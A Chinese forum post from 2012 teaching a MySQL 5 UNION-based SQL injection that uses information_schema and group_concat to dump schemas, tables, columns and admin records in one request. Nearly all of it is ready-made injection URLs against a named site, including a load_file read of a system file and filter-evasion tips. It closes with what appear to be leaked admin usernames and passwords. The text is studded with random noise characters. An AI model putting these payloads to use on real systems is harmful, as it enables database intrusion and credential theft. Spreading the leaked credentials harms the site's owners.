此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似2 {* C6 c9 x+ @
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
$ G4 P! f2 p. [# f. M7 i' K, W: A" r2 ?! I, |; Z' N! l) L
; S# b c9 x9 ?
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
. A4 s* q- @& T# g+ U$ B( k7 y4 _" X. c, R% @- C4 ~/ H
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...8 m. R, t. Y! F7 g9 K0 p
1 H* v' L) O! w% Y" N, R下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
6 T7 e. ?) i1 N) R- ]+ s( p% Q在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
' g& l( B9 z; K9 [
7 r8 P4 B. w, t4 Zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17! `! X3 \2 S8 d j. R
" w" q! `0 v F3 i9 D6 E) r: j读出所有库:
3 L) u1 \. t u: ^1 qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
9 j7 U# p5 \. Y+ a. v
% o6 }; [* \" v' w
/ C! j Z7 S2 ~% l- h9 j) k$ B* G% b# c) h' k+ b C
读出所有表:* P' e% T( o. [ Y& K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
* D. \5 ~; S2 a* i$ f
U4 i4 g! B' l' y9 \$ F读出所有表字段:5 Q. [5 s2 b8 _3 I, [* C
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)% B* n0 D) b* w3 q( V
*/ (97,100,109,105,110)为admin的ascii码 依次类推
& x s) g0 V2 |! @7 D
5 U0 |. H( S4 |& [* y读出所有表字段里的内容:$ Q8 A1 G5 [7 ~! E3 ?: ~* J
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
" K, N- J) L" h8 D ]3 S- C
* _' g6 [9 G! p& |
, {- _6 |# R+ g8 Z+ v! M' `, e4 e8 B. J( o
) Q) ~: T- T4 ?( x
7 {, N2 w9 h6 Y R' s, j; q# x' V8 H2 Z0 R
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23* m" j: Y3 K) b! c8 q! h) K. Z. _, o
! s1 B; x, s8 o, F* C! i& k
% L$ H& Z. e$ _
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
, r _; X K4 Y3 [4 H* c; p S8 r3 D1 F# H, k2 _0 N7 A( Q/ n4 y2 b( |
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
2 C* T4 b" j, i' y' }9 z4 H& d* C( b
3 q4 ?' h1 G; I- L9 N
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
* h& M: m3 y8 \' p; q9 ], F' @) q1 Y1 r# q
- ?$ ` g5 L% I: \
webmaster:dzb521123,simlab:simadmin20043233
/ S5 t- T( o) ]2 B( ^ |
发表于 2012-9-13 16:37:34
收藏
支持
反对